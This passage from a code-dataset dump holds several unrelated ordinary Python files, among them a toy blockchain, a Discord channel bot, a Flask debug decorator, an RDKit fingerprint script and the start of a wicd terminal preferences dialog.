...which will run all necessary checks as it builds and adds blocks...\n i = 0\n for block in blockchain.blocks:\n if i == 0:\n new_blockchain = Blockchain().init_with_genesis_block(block)\n else:\n try:\n new_blockchain.validate_and_add_block(block)\n except:\n print(\"Blockchain contains invalid blocks!\")\n return False\n i += 1\n return True\n\ndef fork_choice(chainA, chainB):\n \"\"\"Returns the longest, valid chain given two choices.\n \n Note: This function assumes that chainA is node's current chain and has therefore already been validated.\n \"\"\"\n\n if not chainA:\n if validate_all_transactions_and_blocks(chainB):\n print(\"There's no ChainA, and ChainB is valid!\")\n return chainB\n elif chainB.get_size() > chainA.get_size():\n if validate_all_transactions_and_blocks(chainB):\n print(\"ChainB is longer and valid!\")\n return chainB\n return chainA\n\ndef create_god_transaction(to_pk):\n \"\"\"Creates first (\"God\") transaction in chain history using seed coins\"\"\"\n\n god_pk, god_sk = signature.generate_keys()\n tx = Transaction(god_pk, to_pk, SEED_COIN_SUPPLY)\n tx.sign(god_sk)\n return tx\n\n\n\nif __name__ == \"__main__\":\n\n pk, sk = signature.generate_keys()\n\n print(\"Firing up a new node!\")\n\n print(\"Your public key is:\")\n print(pk)\n\n print(\"Your secret key is:\")\n print(sk)\n\n # Generate God keys to create seed transaction\n god_pk, god_sk = signature.generate_keys()\n\n # Create two blockchains and implement fork choice\n new_blockchain = None\n for i in range(4):\n if not new_blockchain: # Must mine the Genesis node\n tx = Transaction(god_pk, pk, SEED_COIN_SUPPLY)\n tx.sign(god_sk)\n new_blockchain = Blockchain([tx])\n else:\n to_pk = input(\"Give seed money to:\")\n amount = int(input(\"Amount:\"))\n tx = Transaction(pk, to_pk, amount) # All transactions sent from God node\n tx.sign(sk)\n new_blockchain.add_transactions([tx])\n\n print(\"Creating second blockchain...\")\n\n new_blockchain_2 = None\n for i in range(3):\n if not new_blockchain_2: # Must mine the Genesis node\n tx = Transaction(god_pk, pk, SEED_COIN_SUPPLY)\n tx.sign(god_sk)\n new_blockchain_2 = Blockchain([tx])\n else:\n to_pk = input(\"Give seed money to:\")\n amount = int(input(\"Amount:\"))\n tx = Transaction(pk, to_pk, amount) # All transactions sent from God node\n tx.sign(sk)\n new_blockchain_2.add_transactions([tx])\n\n print(\"We now have TWO blockchains.\")\n print(\"Let's run a fork choice rule!\")\n\n if fork_choice(new_blockchain, new_blockchain_2) == new_blockchain_2:\n print(\"We should update our node's blockchain to blockchain 2!\")\n else:\n print(\"Our first blockchain was the longest, valid chain!\")\n\n\n # test balance function\n # for i in range(2):\n # search_pk = input(\"Get balance of public key:\")\n # balance = BlockAssist.get_balance(search_pk, new_blockchain.blocks)\n # print(balance)\n","repo_name":"stewartfortier/DumbCoin","sub_path":"blockchain.py","file_name":"blockchain.py","file_ext":"py","file_size_in_byte":9408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22351980622","text":"#coding:utf-8\nimport re\nimport pickle\nimport time\ndate = time.strftime('%Y-%m-%d')\ntestfile=open(r\"dns201524.txt\")\nteststr=testfile.read()\ntestfile.close()\nd ={}\nreg=re.compile(r\"(\\w{5}-\\w*)\\s+Host\\s+\\(A\\)\\s+(172\\.17\\.\\d+\\.\\d+)\",re.M)\nmatchs=reg.finditer(teststr)\nwith open ('arp.dump','rb') as f:\n try:\n d = pickle.load (f)\n except EOFError:\n d={}\nf.close()\nfor i in matchs:\n IT_tag 
= i.group(1).strip(\" \")\n IP = i.group(2).strip(\" \")\n for key, info in d.items():\n if info[0] == IP:\n d[key][3] = IT_tag \n##for key, info in d.items():\n## print info\nf1 = open('arp.dump', 'wb')\npickle.dump(d, f1)\nf1.close()\n\n","repo_name":"ver007/python-script","sub_path":"assets_info/dns_search.py","file_name":"dns_search.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74920401769","text":"def getFinalList(l):\n res = [l]\n while True:\n prev = res[-1]\n temp = [prev.count(i) for i in prev]\n if prev == temp:\n break\n res.append(temp)\n # print(res)\n return res\n\ndef solve():\n n = int(input().strip())\n l = list(map(int, input().strip().split()))\n l = getFinalList(l)\n q = int(input().strip())\n for i in range(q):\n x,k = map(int,input().strip().split())\n k = min(k,len(l)-1)\n x-=1\n # print('k',k,'x',x)\n print(l[k][x])\n\nt = int(input().strip())\nfor i in range(t):\n # print('running ', i)\n solve()\n\n\n\"\"\"\nContests/CodeForces/751_Div2/DivineArray.py\n2\n7\n2 1 1 4 3 1 2\n4\n3 0\n1 1\n2 2\n6 1\n2\n1 1\n2\n1 0\n2 1000000000\n\n1\n2\n3\n3\n1\n2\n\n\n\"\"\"","repo_name":"astrixsanath14/repl.it","sub_path":"Contests/CodeForces/751_Div2/DivineArray.py","file_name":"DivineArray.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74162078888","text":"from starlette.routing import Route\n\nfrom actions.system_application import CreditCardSystem\n\nBASE_PATH = '/sistema'\n\n\nclass Router:\n\n @staticmethod\n def get_routes() -> list:\n return [\n Route(f'{BASE_PATH}/solicitacao/', CreditCardSystem.get_cc_applications, methods=['GET']),\n Route(f'{BASE_PATH}/solicitacao/', CreditCardSystem.insert_cc_application, methods=['POST']),\n Route(f'{BASE_PATH}/solicitacao/{{application_id}}', CreditCardSystem.get_one_application,methods=['GET']),\n Route(f'{BASE_PATH}/solicitacao/{{application_id}}', CreditCardSystem.delete_cc_application, methods=['DELETE'])\n ]\n","repo_name":"HumbertoChiesi/card-solicitation-web-app","sub_path":"backend_python_gypz/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2620602078","text":"class ServiceDebugger(object):\n __enable_debug = True\n\n @classmethod\n def set_debug(cls, enable=True):\n cls.__enable_debug = enable\n\n @classmethod\n def debug(cls, show_form=True, show_param=True, show_response=True, count_time=True, content_limit=100, disable=False):\n from flask import request\n from functools import wraps\n from datetime import datetime\n import traceback\n\n if not cls.__enable_debug:\n def empty_wrapper(func):\n return func\n return empty_wrapper\n\n def make_wrapper(func):\n @wraps(func)\n def wrapper(**kwargs):\n if not disable:\n print(\"-\" * 10)\n print(\"Service:{}\".format(func.__name__))\n if show_param:\n print(\"Param:\")\n for name in kwargs:\n val = kwargs[name]\n print(\"\\t{0}: {1}\".format(name, val))\n\n if show_form:\n print(\"FormData:\")\n for name in request.form:\n print(\"\\t{0}: {1}\".format(name, str(request.form.get(name))[:content_limit]))\n\n if count_time:\n start_time = datetime.now()\n print(\"StartTime:{}\".format(start_time))\n\n try:\n resp = func(**kwargs)\n except:\n print(traceback.format_exc())\n resp = \"\"\n traceback.print_exc()\n\n if not disable:\n if 
count_time:\n end_time = datetime.now()\n print(\"EndTime:{}\".format(end_time))\n print(\"TimeCost:{}\".format(end_time - start_time))\n\n if show_response:\n print(\"Return:\" + resp[:content_limit])\n\n return resp\n\n return wrapper\n return make_wrapper","repo_name":"JayceSYH/FactorKeeper","sub_path":"FactorKeeper/Util/ServiceUtil/Debug.py","file_name":"Debug.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20135579332","text":"from PIL import Image\n\nwidth = 940\nheight = 1024\n\n# put source image\nsrc = Image.open('src/source_image.png')\nstartImageHeightList = []\n\noriginPixel = src.getpixel((0,0))\n\nfor x in range(width):\n startImageHeight = 0\n for y in range(int(height/2)):\n pixel = src.getpixel((x, y))\n if originPixel == pixel:\n startImageHeight = y + 1\n continue\n else:\n break\n \n startImageHeightList.append(startImageHeight)\n\nlatterBlankStartList = []\nfor x in range(width):\n latterStartImageHeight = 0\n for y in range(int(height/2)):\n h = 1023 - y\n pixel = src.getpixel((x, h))\n if pixel == originPixel:\n latterStartImageHeight = h - 1\n continue\n else:\n break\n \n latterBlankStartList.append(latterStartImageHeight)\n\nfor i in range(256):\n # put appropriate folder name contains reading images\n src = Image.open('dst_iamges/' + str(i) + '.png')\n\n newImage = Image.new('RGBA', (width, height), (0,0,0,1))\n for x in range(width):\n for y in range(height):\n pixel = src.getpixel((x, y))\n if y < startImageHeightList[x] or y > latterBlankStartList[x]:\n continue\n\n newImage.putpixel((x,y), pixel)\n \n # put target folder name to export image files\n newImage.save('dst_target/' + str(i) + '.png')\n\nprint(\"Finished.\")\n","repo_name":"UnUniFi/nft","sub_path":"genesis-nft/scripts/make_background_transparent.py","file_name":"make_background_transparent.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74199598247","text":"import discord\t\r\nfrom discord import app_commands\r\nfrom discord.ext import commands\r\nfrom discord.components import *\r\nimport asyncio\r\nimport re\r\n# import io\r\n# import requests\r\n# import pytesseract\r\n# from PIL import Image\r\nimport datetime\r\nimport pytz\r\nimport data\r\n\r\nclass ChannelType(commands.Cog):\r\n\tdef __init__(self,bot):\r\n\t\tself.bot = bot\r\n\r\n\r\n\t@commands.command(name=\"ping\",pass_context=True)\r\n\t@commands.has_role(\"Admin\")\r\n\tasync def ping(self,ctx):\r\n\t\tchannel = botChannel(self.bot,ctx)\r\n\t\tawait channel.run()\r\n\r\nclass botChannel:\r\n\tdef __init__(self,bot,ctx):\r\n\t\tself._bot = bot\r\n\t\tself._ctx = ctx\r\n\t\tself._finish = False\r\n\r\n\tasync def inputName(self,msg,error):\r\n\t\tawait self._channel.send(msg)\r\n\t\tdef check(m):\r\n\t\t\treturn m.author.id == 586169972384858123\r\n\t\twhile True:\r\n\t\t\tmessage = await self._bot.wait_for(\"message\",check=check)\r\n\t\t\tif len(message.content) < 15:\r\n\t\t\t\treturn message.content\r\n\t\t\tawait self._channel.send(error)\r\n\t\r\n\tasync def inputInt(self,msg,error):\r\n\t\tawait self._channel.send(msg)\r\n\t\tdef check(m):\r\n\t\t\treturn m.author.id == 586169972384858123\r\n\t\twhile True:\r\n\t\t\ttry:\r\n\t\t\t\tmessage = await self._bot.wait_for(\"message\",check=check)\r\n\t\t\t\treturn int(message.content)\r\n\t\t\texcept ValueError:\r\n\t\t\t\tawait self._channel.send(error)\r\n\r\n\tasync def 
inputFloat(self,msg,error):\r\n\t\tawait self._channel.send(msg)\r\n\t\tdef check(m):\r\n\t\t\treturn m.author.id == 586169972384858123\r\n\t\twhile True:\r\n\t\t\ttry:\r\n\t\t\t\tmessage = await self._bot.wait_for(\"message\",check=check)\r\n\t\t\t\treturn float(message.content)\r\n\t\t\texcept ValueError:\r\n\t\t\t\tawait self._channel.send(error)\r\n\r\n\tasync def inputValidator(self,pattern,msg,error):\r\n\t\tawait self._channel.send(msg)\r\n\t\tdef check(m):\r\n\t\t\treturn m.author.id == 586169972384858123\r\n\t\twhile True:\r\n\t\t\tmessage = await self._bot.wait_for(\"message\",check=check)\r\n\t\t\tif re.match(pattern=pattern,string=message.content,flags=re.IGNORECASE):\r\n\t\t\t\treturn str(message.content).lower()\r\n\t\t\tawait self._channel.send(error)\r\n\r\n\tasync def run(self):\r\n\t\tcategory = discord.utils.get(self._ctx.guild.categories, name=\"🔰┃Internal\")\r\n\r\n\t\tself._channel = await category.create_text_channel(name=\"Settings\",overwrites={self._ctx.author: discord.PermissionOverwrite(view_channel=True,read_message_history=True,send_messages=True,read_messages=True)})\r\n\t\ttimeout_task = asyncio.create_task(self.timeout())\r\n\t\tgetSettings_task = asyncio.create_task(self.getSettings())\r\n\t\tawait asyncio.gather(\r\n            timeout_task,\r\n\t\tgetSettings_task\r\n        \t)\r\n\r\n\tasync def timeout(self):\r\n\t\tawait asyncio.sleep(60*2)\r\n\t\tif not self._finish:\r\n\t\t\tawait self._channel.delete()\r\n\r\n\tasync def getSettings(self):\r\n\t\tname = await self.inputName(\"Input the name of the channel: \",\"Failed!! Re-input the name: \")\r\n\t\tuser_id = await self.inputInt(\"Input the user ID: \",\"Failed!! Re-input the user ID: \")\r\n\t\tbot_id = await self.inputInt(\"Input the bot ID: \",\"Failed!! Re-input the bot ID: \")\r\n\t\ttime = await self.inputFloat(\"Input the usage time: \",\"Failed!! Re-input the usage time: \")\r\n\t\ttype = await self.inputValidator(r\"default\",\"Input the type (Default/Medium/Premium): \",\"Failed!! Re-input the type (Default/Medium/Premium): \")\r\n\t\tchannel = default(self._bot,self._ctx,name,user_id,bot_id,time)\r\n\t\tawait channel.new()\r\n\t\tasyncio.create_task(channel.run())\r\n\t\tself._finish = True\r\n\t\tawait self._channel.delete()\r\n\t\t\r\nclass Channel:\r\n\tdef __init__(self,bot,ctx,name,user_id,bot_id,time):\r\n\t\tself._bot = bot\r\n\t\tself._ctx = ctx\r\n\t\tself._channel = None\r\n\t\tself._time = time\r\n\t\tself._user = user_id\r\n\t\tself._bot_user = bot_id\r\n\t\tself._name = name\r\n\r\n\tasync def new(self):\r\n\t\tcategory = discord.utils.get(self._ctx.guild.categories, name=\"⚔ ┃ Tool\")\r\n\t\tself._user = self._bot.get_user(self._user)\r\n\t\tself._bot_user = self._bot.get_user(self._bot_user)\r\n\t\tself._channel = await category.create_text_channel(name=self._name)\r\n\t\tawait self._channel.edit(sync_permissions=True)\r\n\t\tawait self._channel.set_permissions(self._user,view_channel=True,read_message_history=True,send_messages=True,embed_links=True,attach_files=True,send_messages_in_threads=True,use_application_commands=True)\r\n\t\tawait self._channel.set_permissions(self._bot_user,view_channel=True,attach_files=True,read_message_history=True,send_messages=True)\r\n\t\tawait self._channel.create_thread(name=\"Writing\",type=discord.ChannelType.public_thread)\r\n\r\n\tasync def notification(self):\r\n\t\tchannel_view = self._bot.get_channel(data.channel_view)\r\n\t\tself.timeOpen = datetime.datetime.now(pytz.timezone('Asia/Ho_Chi_Minh'))\r\n\t\tself.timeDelete = self.timeOpen + 
datetime.timedelta(hours=self._time)\r\n\t\tembed = discord.Embed(title=f\":satellite: Channel Info\",description=f\"{self._channel.mention}\",colour=discord.Colour.green())\r\n\t\tembed.set_author(name=f\"{self._channel}\",icon_url=\"https://cdn.discordapp.com/icons/1031519954811494462/bdff3995b5f588e544750b06dc05a49b.webp?size=100\")\r\n\t\tembed.add_field(name=\":id:\",value=f\"{self._channel.id}\")\r\n\t\tembed.add_field(name=\":page_facing_up: Status\",value=f\":white_check_mark: Open\",inline=True)\r\n\t\tembed.add_field(name=\":bust_in_silhouette: Author\",value=f\"{self._user.mention}\",inline=True)\r\n\t\tembed.add_field(name=\":hourglass: Open at\",value=f\"{self.timeOpen}\",inline=True)\r\n\t\tembed.add_field(name=\":hourglass: Delete at\",value=f\"{self.timeDelete}\",inline=True)\r\n\t\tself.notice = await channel_view.send(embed = embed)\r\n\r\n\tasync def notification_finish(self):\r\n\t\tembed2 = discord.Embed(title=f\":satellite: Channel Info\",description=f\"{self._channel.mention}\",colour=discord.Colour.red())\r\n\t\tembed2.set_author(name=f\"{self._channel}\",icon_url=\"https://cdn.discordapp.com/icons/1031519954811494462/bdff3995b5f588e544750b06dc05a49b.webp?size=100\")\r\n\t\tembed2.add_field(name=\":id:\",value=f\"{self._channel.id}\")\r\n\t\tembed2.add_field(name=\":page_facing_up: Status\",value=f\":x: Deleted\")\r\n\t\tembed2.add_field(name=\":bust_in_silhouette: Author\",value=f\"{self._user.mention}\",inline=True)\r\n\t\tembed2.add_field(name=\":hourglass: Open at\",value=f\"{self.timeOpen}\",inline=True)\r\n\t\tembed2.add_field(name=\":hourglass: Delete at\",value=f\"{self.timeDelete}\",inline=True)\r\n\t\tawait self.notice.edit(embed=embed2)\r\n\r\n\r\n\tasync def run(self):\r\n\t\tawait self.notification()\r\n\t\tawait self.timeout()\r\n\t\t\r\n\r\n\tasync def timeout(self):\r\n\t\tawait asyncio.sleep(self._time*60*60)\r\n\t\tawait self.notification_finish()\r\n\t\tawait self._channel.delete()\r\n\t\tself._channel = None\r\n\r\nclass default(Channel):\r\n\tdef __init__(self,bot,ctx,name,user_id,bot_id,time):\r\n\t\tsuper().__init__(bot,ctx,name,user_id,bot_id,time)\r\n\r\n# class medium(Channel):\r\n# \tdef __init__(self,bot,ctx,name,user_id,bot_id,time):\r\n# \t\tsuper().__init__(bot,ctx,name,user_id,bot_id,time)\r\n\r\n# \tasync def run(self):\r\n# \t\tawait asyncio.gather(\r\n#             self.timeout(),\r\n# \t\tself.autoMessage()\r\n# \t)\r\n\r\n# \tasync def autoMessage(self):\r\n# \t\tcheckImg = None\r\n# \t\tdef check(m):\r\n# \t\t\treturn m.channel == self._channel\r\n# \t\twhile self._channel is not None:\r\n# \t\t\ttry:\r\n# \t\t\t\tmessage = await self._bot.wait_for(\"message\",check=check)\r\n# \t\t\texcept:\r\n# \t\t\t\tcontinue\r\n# \t\t\tif(message.attachments):\r\n# \t\t\t\tif(message.attachments[0].filename != checkImg and message.attachments[0].content_type == 'image/png'):\r\n# \t\t\t\t\tcheckImg = message.attachments[0].filename\r\n# \t\t\t\telse:\r\n# \t\t\t\t\tawait message.delete()\r\n# \t\t\telse:\r\n# \t\t\t\tcontinue\r\n\t\t\r\n# class premium(Channel):\r\n# \tdef __init__(self,bot,ctx,name,user_id,bot_id,time):\r\n# \t\tself._data = [None] * 50\r\n# \t\tself._path_to_tesseract = r\"C:\\Program Files\\Tesseract-OCR\\tesseract.exe\"\r\n# \t\tself._thread = None\r\n# \t\tself._question25 = None\r\n# \t\tself._question50 = None\r\n# \t\tsuper().__init__(bot,ctx,name,user_id,bot_id,time)\r\n\r\n# \tasync def run(self):\r\n# \t\tself._thread = await self._channel.create_thread(name=\"UI\")\r\n# \t\tquestion = Question()\r\n# 
\t\tquestion.set_data(self._data)\r\n# \t\tawait question.filter()\r\n# \t\tself._question25 = await self._thread.send(view=question.get_question25())\r\n# \t\tself._question50 = await self._thread.send(view=question.get_question50())\r\n# \t\tawait asyncio.gather(\r\n# self.timeout(),\r\n# \t\tself.autoMessage()\r\n# \t)\r\n\r\n# \tasync def autoMessage(self):\r\n# \t\tcheckImg = None\r\n# \t\tdef check(m):\r\n# \t\t\treturn m.channel == self._channel\r\n# \t\twhile self._channel is not None:\r\n# \t\t\ttry:\r\n# \t\t\t\tmessage = await self._bot.wait_for(\"message\",check=check)\r\n# \t\t\texcept:\r\n# \t\t\t\tcontinue\r\n# \t\t\tif(message.attachments):\r\n# \t\t\t\tif(message.attachments[0].filename != checkImg and message.attachments[0].content_type == 'image/png'):\r\n# \t\t\t\t\tcheckImg = message.attachments[0].filename\r\n# \t\t\t\t\tawait self.img2text(message)\r\n# \t\t\t\telse:\r\n# \t\t\t\t\tawait message.delete()\r\n# \t\t\telse:\r\n# \t\t\t\tcontinue\r\n\r\n# \tasync def update_question(self):\r\n# \t\tquestion = Question()\r\n# \t\tquestion.set_data(self._data)\r\n# \t\tawait question.filter()\r\n# \t\tawait self._question25.edit(view=question.get_question25())\r\n# \t\tawait self._question50.edit(view=question.get_question50())\r\n\r\n# \tasync def img2text(self,message):\r\n# \t\tresponse = requests.get(url=message.attachments[0].proxy_url)\r\n# \t\timg = Image.open(io.BytesIO(response.content))\r\n# \t\tleft = 90\r\n# \t\ttop = 27\r\n# \t\tright = 1927\r\n# \t\tbottom = 810\r\n# \t\timg = img.crop((left, top, right, bottom))\r\n# \t\tpytesseract.pytesseract.tesseract_cmd = self._path_to_tesseract\r\n# \t\ttext = pytesseract.image_to_string(img,lang=\"eng\",config='--oem 3 --psm 6')\r\n# \t\tawait self.checkText(f\"{text}\\n{message.attachments[0].proxy_url}\")\r\n\r\n# \tasync def checkText(self,message):\r\n# \t\tcheck = re.search('Multiple choices (\\d+)/',message)\r\n# \t\tif(check == None):\r\n# \t\t\treturn\r\n# \t\telse:\r\n# \t\t\tself._data[int(check.group(1))-1] = f\"{message}\"\r\n# \t\t\tawait self.update_question()\r\n\r\n\r\n# class Question:\r\n# \tdef __init__(self):\r\n# \t\tself._question25 = Question25()\r\n# \t\tself._question50 = Question50()\r\n# \t\tself._data = [None] * 50\r\n\r\n# \tdef set_data(self,data):\r\n# \t\tself._data = data\r\n\r\n# \tasync def filter(self):\r\n# \t\tdata25,data50 = self._data[:25],self._data[25:]\r\n# \t\tself._question25.set_data(data25)\r\n# \t\tself._question50.set_data(data50)\r\n# \t\tawait self._question25.create_button()\r\n# \t\tawait self._question50.create_button()\r\n\r\n# \tdef get_question25(self):\r\n# \t\treturn self._question25\r\n\r\n# \tdef get_question50(self):\r\n# \t\treturn self._question50\r\n\r\n\r\n\r\n# class Question25(discord.ui.View):\r\n# \tdef __init__(self):\r\n# \t\tsuper().__init__()\r\n# \t\tself._data = [None] * 25\r\n\r\n# \tdef set_data(self,data):\r\n# \t\tself._data = data\r\n\r\n# \tasync def create_button(self):\r\n# \t\tfor i in range(25):\r\n# \t\t\tif(self._data[i] != None):\r\n# \t\t\t\tbutton = Button(f\"{i+1}\",discord.ButtonStyle.green)\r\n# \t\t\telse:\r\n# \t\t\t\tbutton = Button(f\"{i+1}\",discord.ButtonStyle.grey)\r\n# \t\t\tbutton.data = self._data[i]\r\n# \t\t\tself.add_item(button)\r\n\r\n# class Question50(discord.ui.View):\r\n# \tdef __init__(self):\r\n# \t\tsuper().__init__()\r\n# \t\tself._data = [None] * 25\r\n\r\n# \tdef set_data(self,data):\r\n# \t\tself._data = data\r\n\r\n# \tasync def create_button(self):\r\n# \t\tfor i in range(25):\r\n# 
\t\t\tif(self._data[i] != None):\r\n# \t\t\t\tbutton = Button(f\"{i+26}\",discord.ButtonStyle.green)\r\n# \t\t\telse:\r\n# \t\t\t\tbutton = Button(f\"{i+26}\",discord.ButtonStyle.grey)\r\n# \t\t\tbutton.data = self._data[i]\r\n# \t\t\tself.add_item(button)\r\n\r\n\r\n# class Button(discord.ui.Button):\r\n# \tdef __init__(self,label,style):\r\n# \t\tsuper().__init__(label=label,style=style)\r\n\r\n# \tasync def callback(self, interaction: discord.Interaction):\r\n# \t\tawait interaction.response.edit_message(content=self.data)\r\n\r\n\r\nasync def setup(bot:commands.Bot):\r\n\tawait bot.add_cog(ChannelType(bot))","repo_name":"nminhdangit/DiscordBot","sub_path":"cogs/ChannelType.py","file_name":"ChannelType.py","file_ext":"py","file_size_in_byte":11396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8643452834","text":"import numpy as np\n\nfrom PyQt5.QtWidgets import (QApplication, QTableView, QTreeView,\n QMainWindow, QWidget, QGridLayout, QPushButton, QMenu)\nfrom PyQt5.QtCore import (Qt, QAbstractTableModel, QModelIndex)\n\n\nclass NpModel(QAbstractTableModel):\n def __init__(self, data=np.array([[]])):\n super().__init__()\n self.npdata = data\n\n def rowCount(self, index=QModelIndex()):\n return len(self.npdata)\n\n def columnCount(self, index=QModelIndex()):\n return len(self.npdata[0])\n\n def data(self, index, role):\n if not index.isValid() or role != Qt.DisplayRole:\n return None\n val = self.npdata[index.row()][index.column()]\n return str(round(val, 4))\n\n def headerData(self, section, orientation, role):\n if role != Qt.DisplayRole: return None\n if orientation == Qt.Vertical:\n return 'Строка ' + str(section)\n else:\n return 'Столбец ' + str(section)\n\n def set(self, arr=np.array([[]])):\n self.beginResetModel()\n self.npdata = arr\n self.endResetModel()\n self.layoutChanged.emit()\n\n def get(self):\n return self.npdata\n\n\nclass NpTable(QMainWindow):\n def __init__(self, data=np.array([[]]), parent=None):\n super().__init__()\n self.model = NpModel()\n self.view = QTableView()\n self.view.setModel(self.model)\n self.view.horizontalHeader().setSectionResizeMode(1)\n self.btnLoad = QPushButton(\"Reload\")\n self.btnCalc = QPushButton(\"Calc\")\n self.btnGet = QPushButton('Get')\n self.btnLoad.clicked.connect(self.reload)\n self.btnCalc.clicked.connect(self.calc)\n self.btnGet.clicked.connect(self.get_data)\n wgt = QWidget()\n grid = QGridLayout(wgt)\n grid.setContentsMargins(0, 0, 0, 0)\n grid.addWidget(self.view, 0, 0, 4, 4)\n grid.addWidget(self.btnLoad, 4, 0, 1, 1)\n grid.addWidget(self.btnCalc, 4, 1, 1, 1)\n grid.addWidget(self.btnGet, 4, 3, 1, 1)\n self.setCentralWidget(wgt)\n self.load(data)\n\n def reload(self):\n self.model.set(self.data.copy())\n\n def load(self, data=np.array([[]])):\n self.data = data\n self.model.set(data.copy())\n\n def calc(self):\n rows = self.model.rowCount()\n cols = self.model.columnCount()\n for i in range(rows):\n for j in range(cols):\n self.model.npdata[i][j] /= (j + 2)\n self.model.layoutChanged.emit()\n\n def get_data(self):\n print(repr(self.model.get()))\n\n def contextMenuEvent(self, event):\n indexes = [(i.row(), i.column()) for i in self.view.selectionModel().selectedIndexes()]\n self.statusBar().showMessage(str(indexes))\n mnu = QMenu()\n mnu.addAction('x10').setObjectName('calc10')\n mnu.addAction('x100').setObjectName('calc100')\n pos = self.view.mapToGlobal(event.pos())\n ret = mnu.exec_(pos)\n if ret:\n num = 0\n obj = ret.objectName()\n if obj == 'calc10':\n 
num = 10\n elif obj == 'calc100':\n num = 100\n if num:\n for ind in indexes: self.model.npdata[ind] *= num\n index = self.model.index(-1, -1)\n self.view.setCurrentIndex(index)\n self.model.layoutChanged.emit()\n self.statusBar().showMessage('')\n\n\nmass = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9], [10, 11, 12], [13, 14, 15]], float)\n\nif __name__ == \"__main__\":\n app = QApplication([])\n w = NpTable()\n w.load(mass)\n w.resize(600, 400)\n w.move(0, 0)\n w.show()\n app.exec_()","repo_name":"Aisberg-D/ARestaurant","sub_path":"deleted/etable2.py","file_name":"etable2.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35748358161","text":"import sys\ninput = sys.stdin.readline\n\nn= int(input())\nprime = []\nsieve = [False,False] + [True]*(n-1)\n\ndef getPrimes(n):\n for i in range(2,n+1):\n if sieve[i]:\n for j in range(i*2,n+1,i):\n sieve[j] = False\n\n for num in range(n+1):\n if sieve[num]:\n prime.append(num)\n\ngetPrimes(n)\nwindow_start, window_sum = 0,0\nans = 0\nfor window_end in range(len(prime)):\n window_sum += prime[window_end]\n if window_sum == n:\n ans += 1\n while window_sum >= n:\n window_sum -= prime[window_start]\n window_start += 1\n if window_sum == n:\n ans += 1\n\nprint(ans)","repo_name":"jihoonyou/problem-solving-2","sub_path":"boj/1644_소수의 연속합.py","file_name":"1644_소수의 연속합.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17024825664","text":"from argparse import ArgumentParser\nimport re\nimport os\nimport networkx as nx\nimport numpy as np\nimport pickle\nfrom rdkit import Chem\nfrom rdkit.Chem import MACCSkeys \nfrom rdkit import DataStructs\n\ndef get_mol(mol_dir, compound_number):\n molfile = os.path.join(mol_dir, compound_number + '.mol')\n if not os.path.exists(molfile):\n print(\"Cannot find *.mol file for %s.\" % compound_number)\n return None\n m = Chem.MolFromMolFile(molfile)\n if m is None:\n print(\"could not generate Mol from *.mol file for node\", compound_number)\n return m\n\ndef get_maccs_fingerprint_from_mol(m):\n if m is None: return None\n k = MACCSkeys.GenMACCSKeys(m)\n textk = DataStructs.BitVectToText(k)\n binaryvec = np.array(list(map(int, textk)))\n return binaryvec\n\ndef get_pubchem_fingerprint_from_mol(m):\n if m is None: return None\n smile = Chem.MolToSmiles(m)\n return smile\n\ndef compile_maccs_fingerprints(compounds, mol_dir, output_file=None):\n maccs = {}\n for c in compounds:\n fp = get_maccs_fingerprint_from_mol(get_mol(mol_dir, c))\n if fp is not None:\n maccs[c] = fp\n print('%d/%d compounds have MACCS fingerprints' % (len(maccs), len(compounds)))\n if output_file is not None:\n with open(output_file, 'wb') as f:\n pickle.dump(maccs, f)\n print('Dumped to', output_file)\n return maccs\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument(\n '--mol_dir', \n help='A valid path to the directory ligand/compound/mol, ' + \\\n 'where each compound has a CXXXXX.mol file.',\n default='%s/kegg/Ligand_April_20_2020/compound/mol'\\\n % os.environ['DATAPATH'])\n parser.add_argument(\n '--kegg_edgelist',\n default='%s/kegg/kegg_2020.edgelist' % os.environ['DATAPATH'])\n parser.add_argument(\n '--maccs_file',\n default='%s/kegg/kegg_2020_maccs_fp.pkl' % os.environ['DATAPATH'])\n args = parser.parse_args() \n G = nx.read_edgelist(args.kegg_edgelist)\n compile_maccs_fingerprints(G.nodes, args.mol_dir, 
args.maccs_file)\n","repo_name":"HassounLab/ELP","sub_path":"preprocessing/compile_maccs_fp.py","file_name":"compile_maccs_fp.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"17286516942","text":"import urwid\nimport urwid.curses_display\n\nfrom wicd import misc\nfrom wicd.translations import _\nfrom curses_misc import SelText, DynWrap, DynRadioButton, ComboBox, TabColumns\n\ndaemon = None\nwireless = None\nwired = None\n\n\nclass PrefsDialog(urwid.WidgetWrap):\n \"\"\" Preferences dialog. \"\"\"\n # pylint: disable-msg=W0231\n def __init__(self, body, pos, ui, dbus=None):\n global daemon, wireless, wired\n\n self.thebackends = None\n self.backends = None\n self.wpadrivers = None\n self.thedrivers = None\n\n daemon = dbus['daemon']\n wireless = dbus['wireless']\n wired = dbus['wired']\n\n width, height = ui.get_cols_rows()\n height -= 3\n #width = 80\n #height = 20\n # Stuff that goes at the top\n\n header0_t = _('General Settings')\n header1_t = _('External Programs')\n header2_t = _('Advanced Settings')\n self.header0 = urwid.AttrWrap(SelText(header0_t), 'tab active', 'focus')\n self.header1 = 